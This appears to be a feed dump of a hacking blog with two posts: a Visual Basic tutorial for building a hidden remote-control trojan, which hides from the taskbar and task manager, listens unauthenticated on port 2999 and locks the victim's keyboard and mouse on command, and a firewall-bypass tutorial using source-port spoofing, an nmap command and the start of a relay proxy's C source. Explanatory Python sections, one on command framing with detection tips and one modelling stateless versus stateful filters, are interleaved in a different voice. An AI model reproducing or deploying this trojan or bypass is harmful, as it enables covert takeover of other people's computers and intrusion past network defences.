is two simple applications both with fewer than 100 lines of  code. The first application is the client or the program that one user  knows about. The second is the server or the actual “trojan” part. I  will now go through what you need for both and some sample code.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Server&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
The server is the Trojan part of the program. You usually will want this  to be as hidden as possible so the average user can’t find it. To do  this you start by using&lt;br /&gt;
&lt;br /&gt;
&lt;div style="margin-top: 5px; margin: 20px;"&gt;  &lt;div class="smallfont" style="margin-bottom: 2px;"&gt;Code: VB&lt;/div&gt;&lt;pre class="alt2" style="border: 1px inset; height: 84px; margin: 0px; overflow: auto; padding: 6px; width: 640px;"&gt;&lt;div dir="ltr" style="text-align: left;"&gt;&lt;div class="vb"&gt;&lt;span style="color: blue;"&gt;Private&lt;/span&gt; &lt;span style="color: blue;"&gt;Sub&lt;/span&gt; Form_Load&lt;span style="color: #66cc66;"&gt;(&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;)&lt;/span&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;span style="color: blue;"&gt;Me&lt;/span&gt;.&lt;span&gt;Visible&lt;/span&gt; = &lt;span style="color: blue;"&gt;False&lt;/span&gt;
&lt;span style="color: blue;"&gt;End&lt;/span&gt; &lt;span style="color: blue;"&gt;Sub&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;/pre&gt;&lt;/div&gt;&amp;nbsp;This little bit of code makes the program invisible to the naked eye.  Now we all know that the task manager is a little bit peskier. So to get  our application hidden from that a little better we make our code look  like this. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style="margin-top: 5px; margin: 20px;"&gt;  &lt;div class="smallfont" style="margin-bottom: 2px;"&gt;Code: VB&lt;/div&gt;&lt;pre class="alt2" style="border: 1px inset; height: 100px; margin: 0px; overflow: auto; padding: 6px; width: 640px;"&gt;&lt;div dir="ltr" style="text-align: left;"&gt;&lt;div class="vb"&gt;&lt;span style="color: blue;"&gt;Private&lt;/span&gt; &lt;span style="color: blue;"&gt;Sub&lt;/span&gt; Form_Load&lt;span style="color: #66cc66;"&gt;(&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;)&lt;/span&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;span style="color: blue;"&gt;Me&lt;/span&gt;.&lt;span&gt;Visible&lt;/span&gt; = &lt;span style="color: blue;"&gt;False&lt;/span&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp;App.&lt;span&gt;TaskVisible&lt;/span&gt; = &lt;span style="color: blue;"&gt;False&lt;/span&gt;
&lt;span style="color: blue;"&gt;End&lt;/span&gt; &lt;span style="color: blue;"&gt;Sub&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;/pre&gt;&lt;/div&gt;So now, we have a program that is virtually invisible to the  average user, and it only took four lines of code. Now all of you are  thinking that this tutorial sucks right about now so lets make it a lot  better by adding functions to our Trojan!&lt;br /&gt;
The first thing we want to do is make it be able to listen for  connections when it loads. So in order to do this we need to add a  Winsock Control. I named my control win but you can name yours what  ever. &lt;br /&gt;
&lt;br /&gt;
Now to make it listen on port 2999 when the Trojan starts up we make our code look like this.&lt;br /&gt;
&lt;div style="margin-top: 5px; margin: 20px;"&gt;  &lt;div class="smallfont" style="margin-bottom: 2px;"&gt;Code: VB&lt;/div&gt;&lt;pre class="alt2" style="border: 1px inset; height: 148px; margin: 0px; overflow: auto; padding: 6px; width: 640px;"&gt;&lt;div dir="ltr" style="text-align: left;"&gt;&lt;div class="vb"&gt;&lt;span style="color: blue;"&gt;Private&lt;/span&gt; &lt;span style="color: blue;"&gt;Sub&lt;/span&gt; Form_Load&lt;span style="color: #66cc66;"&gt;(&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;)&lt;/span&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;span style="color: blue;"&gt;Me&lt;/span&gt;.&lt;span&gt;Visible&lt;/span&gt; = &lt;span style="color: blue;"&gt;False&lt;/span&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp;App.&lt;span&gt;TaskVisible&lt;/span&gt; = &lt;span style="color: blue;"&gt;False&lt;/span&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp;win.&lt;span&gt;LocalPort&lt;/span&gt; = &lt;span style="color: #cc66cc;"&gt;2999&lt;/span&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp;win.&lt;span&gt;RemotePort&lt;/span&gt; = &lt;span style="color: #cc66cc;"&gt;455&lt;/span&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp;win.&lt;span&gt;Listen&lt;/span&gt;
&lt;span style="color: blue;"&gt;End&lt;/span&gt; &lt;span style="color: blue;"&gt;Sub&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;/pre&gt;&lt;/div&gt;This code will set the local open port to 2999 and the port it  sends it to is 455. So now, we have a program that listens but still  doesn’t do anything neat. Lets make it block the input of the user  completely when we tell it to!&lt;br /&gt;
&lt;br /&gt;
To do this devious little thing we need to add a module with the following code:&lt;br /&gt;
&lt;br /&gt;
Public Declare Function BlockInput Lib "user32" (ByVal fBlock As Long) As Long&lt;br /&gt;
&lt;br /&gt;
Then we add this code to our main form:&lt;br /&gt;
&lt;br /&gt;
&lt;div style="margin-top: 5px; margin: 20px;"&gt;  &lt;div class="smallfont" style="margin-bottom: 2px;"&gt;Code: VB&lt;/div&gt;&lt;pre class="alt2" style="border: 1px inset; height: 180px; margin: 0px; overflow: auto; padding: 6px; width: 640px;"&gt;&lt;div dir="ltr" style="text-align: left;"&gt;&lt;div class="vb"&gt;&lt;span style="color: blue;"&gt;Private&lt;/span&gt; &lt;span style="color: blue;"&gt;Sub&lt;/span&gt; win_ConnectionRequest&lt;span style="color: #66cc66;"&gt;(&lt;/span&gt;ByVal requestID &lt;span style="color: blue;"&gt;As&lt;/span&gt; &lt;span style="color: blue;"&gt;Long&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;)&lt;/span&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp;win.&lt;span style="color: blue;"&gt;Close&lt;/span&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp;win.&lt;span&gt;Accept&lt;/span&gt; requestID
&lt;span style="color: blue;"&gt;End&lt;/span&gt; &lt;span style="color: blue;"&gt;Sub&lt;/span&gt;

&lt;span style="color: blue;"&gt;Private&lt;/span&gt; &lt;span style="color: blue;"&gt;Sub&lt;/span&gt; win_DataArrival&lt;span style="color: #66cc66;"&gt;(&lt;/span&gt;ByVal bytesTotal &lt;span style="color: blue;"&gt;As&lt;/span&gt; &lt;span style="color: blue;"&gt;Long&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;)&lt;/span&gt;
&amp;nbsp; &amp;nbsp; win.&lt;span&gt;GetData&lt;/span&gt; GotDat
&amp;nbsp; &amp;nbsp; DoActions &lt;span style="color: #66cc66;"&gt;(&lt;/span&gt;GotDat&lt;span style="color: #66cc66;"&gt;)&lt;/span&gt;
&lt;span style="color: blue;"&gt;End&lt;/span&gt; &lt;span style="color: blue;"&gt;Sub&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;/pre&gt;&lt;/div&gt;The code in the module is called a windows API. It uses a dll file  to do tasks that we want. Now this code still won’t block the users  input but we are very close. We now need to program the DoActions  function that we called on our main form. In case you were wondering the  code that we added to the form does two different things. The first sub  makes it so all connection requests are automatacly accepted. The  second sub makes it so all data is automaticly accepted and it then  passes all of the data to the function DoActions which we are about to  code.&lt;br /&gt;
&lt;br /&gt;
For the DoActions code, we want to make a public function in the module.  So add this code to the module and we are about done with the server of  the Trojan!&lt;br /&gt;
&lt;br /&gt;
&lt;div style="margin-top: 5px; margin: 20px;"&gt;  &lt;div class="smallfont" style="margin-bottom: 2px;"&gt;Code: VB&lt;/div&gt;&lt;pre class="alt2" style="border: 1px inset; height: 148px; margin: 0px; overflow: auto; padding: 6px; width: 640px;"&gt;&lt;div dir="ltr" style="text-align: left;"&gt;&lt;div class="vb"&gt;&lt;span style="color: blue;"&gt;Public&lt;/span&gt; &lt;span style="color: blue;"&gt;Function&lt;/span&gt; DoActions&lt;span style="color: #66cc66;"&gt;(&lt;/span&gt;x &lt;span style="color: blue;"&gt;As&lt;/span&gt; &lt;span style="color: blue;"&gt;String&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;)&lt;/span&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;span style="color: blue;"&gt;Dim&lt;/span&gt; Action
&amp;nbsp; &amp;nbsp; &amp;nbsp;Select &lt;span style="color: blue;"&gt;Case&lt;/span&gt; x
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;span style="color: blue;"&gt;Case&lt;/span&gt; &lt;span style="color: red;"&gt;"block"&lt;/span&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Action = BlockInput&lt;span style="color: #66cc66;"&gt;(&lt;/span&gt;&lt;span style="color: blue;"&gt;True&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;)&lt;/span&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;span style="color: blue;"&gt;End&lt;/span&gt; Select
&lt;span style="color: blue;"&gt;End&lt;/span&gt; &lt;span style="color: blue;"&gt;Function&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;/pre&gt;&lt;/div&gt;Ok now we have a program that when the data “block” is sent to it  on port 2999 it will block the users input. I made a Select Case  statement so it is easy to modify this code to your own needs later on. I  recommend adding a unblock feature of your own. To do that just call  the BlockInput function with the argument False instead of true.&lt;br /&gt;
&lt;br /&gt;
Main Form&lt;br /&gt;
&lt;div style="margin-top: 5px; margin: 20px;"&gt;  &lt;div class="smallfont" style="margin-bottom: 2px;"&gt;Code: VB&lt;/div&gt;&lt;pre class="alt2" style="border: 1px inset; height: 308px; margin: 0px; overflow: auto; padding: 6px; width: 640px;"&gt;&lt;div dir="ltr" style="text-align: left;"&gt;&lt;div class="vb"&gt;&lt;span style="color: blue;"&gt;Private&lt;/span&gt; &lt;span style="color: blue;"&gt;Sub&lt;/span&gt; Form_Load&lt;span style="color: #66cc66;"&gt;(&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;)&lt;/span&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;span style="color: blue;"&gt;Me&lt;/span&gt;.&lt;span&gt;Visible&lt;/span&gt; = &lt;span style="color: blue;"&gt;False&lt;/span&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp;App.&lt;span&gt;TaskVisible&lt;/span&gt; = &lt;span style="color: blue;"&gt;False&lt;/span&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp;win.&lt;span&gt;LocalPort&lt;/span&gt; = &lt;span style="color: #cc66cc;"&gt;2999&lt;/span&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp;win.&lt;span&gt;RemotePort&lt;/span&gt; = &lt;span style="color: #cc66cc;"&gt;455&lt;/span&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp;win.&lt;span&gt;Listen&lt;/span&gt;
&lt;span style="color: blue;"&gt;End&lt;/span&gt; &lt;span style="color: blue;"&gt;Sub&lt;/span&gt;

&lt;span style="color: blue;"&gt;Private&lt;/span&gt; &lt;span style="color: blue;"&gt;Sub&lt;/span&gt; win_ConnectionRequest&lt;span style="color: #66cc66;"&gt;(&lt;/span&gt;ByVal requestID &lt;span style="color: blue;"&gt;As&lt;/span&gt; &lt;span style="color: blue;"&gt;Long&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;)&lt;/span&gt; &lt;span style="color: grey;"&gt;' As corrected by Darkness1337&lt;/span&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp;win.&lt;span style="color: blue;"&gt;Close&lt;/span&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp;win.&lt;span&gt;Accept&lt;/span&gt; requestID
&lt;span style="color: blue;"&gt;End&lt;/span&gt; &lt;span style="color: blue;"&gt;Sub&lt;/span&gt;

&lt;span style="color: blue;"&gt;Private&lt;/span&gt; &lt;span style="color: blue;"&gt;Sub&lt;/span&gt; win_DataArrival&lt;span style="color: #66cc66;"&gt;(&lt;/span&gt;ByVal bytesTotal &lt;span style="color: blue;"&gt;As&lt;/span&gt; &lt;span style="color: blue;"&gt;Long&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;)&lt;/span&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp;win.&lt;span&gt;GetData&lt;/span&gt; GotDat
&amp;nbsp; &amp;nbsp; &amp;nbsp;DoActions &lt;span style="color: #66cc66;"&gt;(&lt;/span&gt;GotDat&lt;span style="color: #66cc66;"&gt;)&lt;/span&gt;
&lt;span style="color: blue;"&gt;End&lt;/span&gt; &lt;span style="color: blue;"&gt;Sub&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;/pre&gt;&lt;/div&gt;Remember to add a Winsock control to the form and name it win if you use this code. The listener starts on TCP port 2999 as soon as the form loads, and nothing on the wire authenticates the client, so anyone who can reach that port can send it commands.&lt;br /&gt;
&lt;br /&gt;
&lt;div style="margin-top: 5px; margin: 20px;"&gt;  &lt;div class="smallfont" style="margin-bottom: 2px;"&gt;Code: VB&lt;/div&gt;&lt;pre class="alt2" style="border: 1px inset; height: 212px; margin: 0px; overflow: auto; padding: 6px; width: 640px;"&gt;&lt;div dir="ltr" style="text-align: left;"&gt;&lt;div class="vb"&gt;Module

&lt;span style="color: blue;"&gt;Public&lt;/span&gt; &lt;span style="color: blue;"&gt;Declare&lt;/span&gt; &lt;span style="color: blue;"&gt;Function&lt;/span&gt; BlockInput Lib &lt;span style="color: red;"&gt;"user32"&lt;/span&gt; &lt;span style="color: #66cc66;"&gt;(&lt;/span&gt;ByVal fBlock &lt;span style="color: blue;"&gt;As&lt;/span&gt; &lt;span style="color: blue;"&gt;Long&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;)&lt;/span&gt; &lt;span style="color: blue;"&gt;As&lt;/span&gt; &lt;span style="color: blue;"&gt;Long&lt;/span&gt;

&lt;span style="color: blue;"&gt;Public&lt;/span&gt; &lt;span style="color: blue;"&gt;Function&lt;/span&gt; DoActions&lt;span style="color: #66cc66;"&gt;(&lt;/span&gt;x &lt;span style="color: blue;"&gt;As&lt;/span&gt; &lt;span style="color: blue;"&gt;String&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;)&lt;/span&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;span style="color: blue;"&gt;Dim&lt;/span&gt; Action
&amp;nbsp; &amp;nbsp; &amp;nbsp;Select &lt;span style="color: blue;"&gt;Case&lt;/span&gt; x
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;span style="color: blue;"&gt;Case&lt;/span&gt; &lt;span style="color: red;"&gt;"block"&lt;/span&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Action = BlockInput&lt;span style="color: #66cc66;"&gt;(&lt;/span&gt;&lt;span style="color: blue;"&gt;True&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;)&lt;/span&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;span style="color: blue;"&gt;End&lt;/span&gt; Select
&lt;span style="color: blue;"&gt;End&lt;/span&gt; &lt;span style="color: blue;"&gt;Function&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;/pre&gt;&lt;/div&gt;That’s all there is to the server side or Trojan part of it. Now on to the Client.&lt;br /&gt;
&lt;br /&gt;
Client&lt;br /&gt;
&lt;br /&gt;
The client is the part you interact with: it connects to the remote server (the trojan) and sends it commands. Since the server we made accepts the command “block”, let's make a client that sends “block”.&lt;br /&gt;
&lt;br /&gt;
Make a form and add a Winsock control, a text box and three buttons. For the code below to work, the text box must be named txtIP and the buttons cmdConnect, cmdBlockInput and cmdDisconnect (VB identifiers are case-insensitive, so txtIp and Win in the code refer to the same controls). Now let's look at the client code.&lt;br /&gt;
&lt;br /&gt;
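Before the client code, one thing about the protocol between the two halves is worth seeing. The server's DoActions compares the whole of what GetData returned with the string "block", and the client's SendData writes that bare string with no terminator. TCP is a byte stream, so two quick sends can arrive in one chunk and a single send can be split. The Python below, an added example rather than code from this post, replays that over loopback and shows the fix of framing each command with a newline; because BlockInput exists only on Windows, the 'block' action here just records that it ran.

```python
"""Command framing for the VB server above, reproduced over loopback.

Added example; this is not code from the original post. The VB server hands
whatever GetData returns straight to Select Case, so it only works while each
SendData arrives as exactly one chunk, and TCP promises no such thing.
BlockInput is Windows-only, so the 'block' action here only records itself;
the point is how commands are delimited on the wire.
"""
import socket
import threading


def dispatch_exact(chunk, executed):
    """Mirror of DoActions: the whole received buffer must equal one command."""
    if chunk == b"block":
        executed.append("block")


def dispatch_framed(buf, executed):
    """Newline-framed dispatcher: handle every complete line in buf and
    return the unfinished tail, which the caller keeps for the next recv."""
    while b"\n" in buf:
        line, buf = buf.split(b"\n", 1)
        if line == b"block":
            executed.append("block")
        elif line == b"unblock":
            executed.append("unblock")
    return buf


def exchange(client_payloads, framed):
    """Start a one-shot server on 127.0.0.1, have a client send the payloads
    back to back, then let the server read them with a single recv(), the way
    win_DataArrival would after both segments had queued up.
    Returns the list of actions the server executed."""
    executed = []
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))           # port 0: let the OS pick a free port
    srv.listen(1)
    port = srv.getsockname()[1]
    all_sent = threading.Event()

    def server():
        conn, _ = srv.accept()
        with conn:
            all_sent.wait()              # every send has been queued before we read
            data = conn.recv(4096)       # equivalent of win.GetData GotDat
            if framed:
                dispatch_framed(data, executed)
            else:
                dispatch_exact(data, executed)

    worker = threading.Thread(target=server)
    worker.start()
    with socket.create_connection(("127.0.0.1", port)) as cli:
        for payload in client_payloads:
            cli.sendall(payload)         # equivalent of Win.SendData
        all_sent.set()
        worker.join()
    srv.close()
    return executed


def demo():
    """Two quick clicks on cmdBlockInput: the exact-match server receives
    b'blockblock' and silently does nothing; the framed server acts twice."""
    unframed = exchange([b"block", b"block"], framed=False)
    framed = exchange([b"block\n", b"unblock\n"], framed=True)
    return unframed, framed


if __name__ == "__main__":
    print(demo())
```

The VB server also has no authentication, so anyone who can reach port 2999 can drive it; on the affected machine, netstat -ano (Windows) or ss -ltnp (Linux) lists the unexpected listener together with the process that owns it.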
&lt;div style="margin-top: 5px; margin: 20px;"&gt;  &lt;div class="smallfont" style="margin-bottom: 2px;"&gt;Code: VB&lt;/div&gt;&lt;pre class="alt2" style="border: 1px inset; height: 324px; margin: 0px; overflow: auto; padding: 6px; width: 640px;"&gt;&lt;div dir="ltr" style="text-align: left;"&gt;&lt;div class="vb"&gt;&lt;span style="color: blue;"&gt;Private&lt;/span&gt; &lt;span style="color: blue;"&gt;Sub&lt;/span&gt; cmdConnect_Click&lt;span style="color: #66cc66;"&gt;(&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;)&lt;/span&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;span style="color: blue;"&gt;Dim&lt;/span&gt; IpAddy &lt;span style="color: blue;"&gt;As&lt;/span&gt; &lt;span style="color: blue;"&gt;String&lt;/span&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp;IpAddy = txtIp.&lt;span&gt;Text&lt;/span&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp;Win.&lt;span style="color: blue;"&gt;Close&lt;/span&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp;Win.&lt;span&gt;RemotePort&lt;/span&gt; = &lt;span style="color: #cc66cc;"&gt;2999&lt;/span&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp;Win.&lt;span&gt;RemoteHost&lt;/span&gt; = IpAddy
&amp;nbsp; &amp;nbsp; &amp;nbsp;Win.&lt;span&gt;LocalPort&lt;/span&gt; = &lt;span style="color: #cc66cc;"&gt;9999&lt;/span&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp;Win.&lt;span&gt;Connect&lt;/span&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp;cmdConnect.&lt;span&gt;Enabled&lt;/span&gt; = &lt;span style="color: blue;"&gt;False&lt;/span&gt;
&lt;span style="color: blue;"&gt;End&lt;/span&gt; &lt;span style="color: blue;"&gt;Sub&lt;/span&gt;

&lt;span style="color: blue;"&gt;Private&lt;/span&gt; &lt;span style="color: blue;"&gt;Sub&lt;/span&gt; cmdDisconnect_Click&lt;span style="color: #66cc66;"&gt;(&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;)&lt;/span&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp;Win.&lt;span style="color: blue;"&gt;Close&lt;/span&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp;cmdConnect.&lt;span&gt;Enabled&lt;/span&gt; = &lt;span style="color: blue;"&gt;True&lt;/span&gt;
&lt;span style="color: blue;"&gt;End&lt;/span&gt; &lt;span style="color: blue;"&gt;Sub&lt;/span&gt;

&lt;span style="color: blue;"&gt;Private&lt;/span&gt; &lt;span style="color: blue;"&gt;Sub&lt;/span&gt; cmdBlockInput_Click&lt;span style="color: #66cc66;"&gt;(&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;)&lt;/span&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp;Win.&lt;span&gt;SendData&lt;/span&gt; &lt;span style="color: red;"&gt;"block"&lt;/span&gt;
&lt;span style="color: blue;"&gt;End&lt;/span&gt; &lt;span style="color: blue;"&gt;Sub&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;/pre&gt;&lt;/div&gt;That is the code for the client. All it does is read the IP address from txtIP, connect to it on remote port 2999 and, once connected, send the string “block”, which the server hands to BlockInput to lock the remote keyboard and mouse.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1548500639891694165-3605620016488434224?l=hackmystuff.blogspot.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/UlQki/~4/gZy4QhpRZM4" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/blogspot/UlQki/~3/gZy4QhpRZM4/simple-trojan-in-vb-only-for-learning.html</link><author>noreply@blogger.com (Eracnid Mitnick)</author><thr:total>0</thr:total><feedburner:origLink>http://hackmystuff.blogspot.com/2011/05/simple-trojan-in-vb-only-for-learning.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1548500639891694165.post-7232111292099130673</guid><pubDate>Sun, 08 May 2011 22:38:00 +0000</pubDate><atom:updated>2011-05-08T15:38:48.916-07:00</atom:updated><title>Exploiting buggy/weak Firewalls</title><description>In this tutorial we'll look at a way (new to me, at least) to bypass weak firewalls.&lt;br /&gt;
&lt;br /&gt;
A firewall is a device, or set of devices, that permits or denies network traffic according to a set of rules; it is used to protect networks from unauthorized access while letting legitimate communication through. (Wikipedia)&lt;br /&gt;
&lt;br /&gt;
In plain terms, a firewall holds a list of rules (packet filters, signatures and so on) and checks network traffic against them for anything that could be harmful to the machines behind it.&lt;br /&gt;
&lt;br /&gt;
Firewalls are deployed to keep attackers away from parts of a network, but a firewall that is poorly written or poorly configured can make exploitation easier rather than harder. To show how such a firewall can be abused, let's take a scenario.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;h3 class="articleheading"&gt;&lt;a href="" name="bg"&gt;&lt;/a&gt;Scenario&lt;/h3&gt;&lt;br /&gt;
&lt;br /&gt;
Many weak firewalls are stateless packet filters: they decide on each packet in isolation from the fields in its header, including the source port, and none of those fields can be trusted, because the sender chooses them.&lt;br /&gt;
&lt;br /&gt;
Suppose a system sits behind one of these filters, which blocks inbound SSH (port 22), SMB (port 445) and the like, while FTP (port 21) and HTTP (port 80) are left open because clients use them all day. A common mistake in such rule sets is a rule meant to let FTP or HTTP replies back in that is keyed on the source port alone, e.g. "allow TCP from source port 21 or 80 to any port".&lt;br /&gt;
&lt;br /&gt;
Our job is then to originate our connections from source port 21 (or 80), with the destination port set to the service we actually want, SMB on 445. The filter matches the source port against its allow rule and passes the packet, and the protected service becomes reachable. The kev proxy below does exactly this: it binds the outbound socket to a chosen source port before calling connect(). Two caveats: binding a port below 1024 needs root, and a stateful firewall is not fooled, because it only accepts packets that belong to a connection it has already seen start in the permitted direction. A quick check for the weakness is nmap's --source-port (-g) option, e.g. nmap -sS -g 21 -p 445 target, compared with the same scan from an ordinary source port.&lt;br /&gt;
&lt;br /&gt;
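The scenario above boils down to a filter that trusts a header field the sender controls. The following Python model, added here as an illustration and not part of the original post or of kev proxy, evaluates the same SMB SYN against a stateless rule set of the kind described and against a minimal stateful filter. The addresses, the rule set and the packets are constructed for the demo.

```python
"""Toy packet filter: why a source-port-based ACL is bypassable.

Added illustration for this post (not part of kev proxy or the original
article). The rule sets, addresses and packets are constructed for the demo.
"""
from collections import namedtuple

# A TCP segment reduced to the fields a packet filter looks at.
Packet = namedtuple("Packet", "src_ip src_port dst_ip dst_port syn ack")

PROTECTED_HOST = "10.0.0.5"          # assumed address of the filtered system
ALLOWED_SERVICES = {21, 80}          # FTP and HTTP are open to clients


def stateless_allow(pkt):
    """Weak filter: decides per packet, trusting the port numbers it sees.

    Rule 1 lets clients reach FTP/HTTP on the protected host.  Rule 2 was
    meant to let replies from FTP/HTTP servers elsewhere come back in, but
    it is keyed on the *source* port alone, which the sender controls.
    """
    if pkt.dst_ip == PROTECTED_HOST and pkt.dst_port in ALLOWED_SERVICES:
        return True                              # rule 1: inbound to open services
    if pkt.dst_ip == PROTECTED_HOST and pkt.src_port in ALLOWED_SERVICES:
        return True                              # rule 2: "replies" from FTP/HTTP
    return False


class StatefulFilter:
    """Corrected filter: only packets that belong to a connection the
    protected host opened, or that rule 1 admitted, get through."""

    def __init__(self):
        self.flows = set()   # (client_ip, client_port, server_ip, server_port)

    def allow(self, pkt):
        new_connection = pkt.syn and not pkt.ack
        if new_connection:
            flow = (pkt.src_ip, pkt.src_port, pkt.dst_ip, pkt.dst_port)
            if pkt.dst_ip == PROTECTED_HOST and pkt.dst_port in ALLOWED_SERVICES:
                self.flows.add(flow)             # inbound to an open service
                return True
            if pkt.src_ip == PROTECTED_HOST:
                self.flows.add(flow)             # outbound: remember it for replies
                return True
            return False                         # any other SYN, whatever its source port
        # Everything else must match a known flow in either direction.
        fwd = (pkt.src_ip, pkt.src_port, pkt.dst_ip, pkt.dst_port)
        rev = (pkt.dst_ip, pkt.dst_port, pkt.src_ip, pkt.src_port)
        return fwd in self.flows or rev in self.flows


def demo():
    """Evaluate the post's trick and a genuine reply under both filters."""
    attacker = "192.0.2.10"
    web_server = "203.0.113.7"
    # The trick from the scenario: a SYN to SMB (445) sent *from* port 21.
    smb_syn_spoofed = Packet(attacker, 21, PROTECTED_HOST, 445, syn=True, ack=False)
    smb_syn_normal = Packet(attacker, 40000, PROTECTED_HOST, 445, syn=True, ack=False)
    # A legitimate exchange: the protected host browses out, the reply comes back.
    outbound_syn = Packet(PROTECTED_HOST, 50000, web_server, 80, syn=True, ack=False)
    reply_synack = Packet(web_server, 80, PROTECTED_HOST, 50000, syn=True, ack=True)

    stateful = StatefulFilter()
    stateful.allow(outbound_syn)
    return {
        "stateless_normal": stateless_allow(smb_syn_normal),
        "stateless_spoofed": stateless_allow(smb_syn_spoofed),
        "stateful_normal": stateful.allow(smb_syn_normal),
        "stateful_spoofed": stateful.allow(smb_syn_spoofed),
        "stateful_real_reply": stateful.allow(reply_synack),
    }


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(name, "ALLOWED" if verdict else "DROPPED")
```

Run it and the stateless filter passes the SYN to 445 as soon as its source port is 21, while the stateful one passes only the reply to a connection the protected host itself opened. That is why the fix is connection tracking rather than a longer list of ports.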
&lt;b&gt; Tool that can be used (Kev proxy) :-&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="smallfont" style="margin-bottom: 2px;"&gt;Code:&lt;/div&gt;&lt;pre class="alt2" dir="ltr" style="border: 1px inset; height: 418px; margin: 0px; overflow: auto; padding: 6px; text-align: left; width: 640px;"&gt;/*
 * kev proxy
 * it's not big, but then, it's not that clever either.
 *
 * compile with cc -o kp kp.c -lpthread
 * tested on Red Hat 8, should work on most Linux
 *
 * kp listen_port target_ip target_port &amp;lt;source_port&amp;gt; &amp;lt;v&amp;gt;
 *
 * kp will listen on the listen_port and relay bi-directional data
 * between this port and the target_port on the target_ip.
 * The optional source_port is to set the source port on the outbound
 * connection to the target_ip.  Useful for getting around ACLs in
 * routers and firewalls.
 * 'v' indicates verbose mode for extra info.
 *
 * Note: it does not operate as a 'real' HTTP proxy, although it can
 * proxy HTTP as well as any other TCP protocol; just don't let your
 * browser know it's talking to a proxy ;) (unless, of course, you're
 * proxying for an HTTP proxy!)
*/


#include &amp;lt;sys/types.h&amp;gt;
#include &amp;lt;sys/socket.h&amp;gt;
#include &amp;lt;sys/select.h&amp;gt;
#include &amp;lt;netinet/in.h&amp;gt;
#include &amp;lt;arpa/inet.h&amp;gt;     /* inet_addr() */
#include &amp;lt;netdb.h&amp;gt;
#include &amp;lt;string.h&amp;gt;
#include &amp;lt;stdio.h&amp;gt;
#include &amp;lt;stdlib.h&amp;gt;        /* atoi(), exit() */
#include &amp;lt;stdint.h&amp;gt;        /* intptr_t, used to hand the fd to the thread */
#include &amp;lt;ctype.h&amp;gt;
#include &amp;lt;unistd.h&amp;gt;
#include &amp;lt;fcntl.h&amp;gt;
#include &amp;lt;pthread.h&amp;gt;
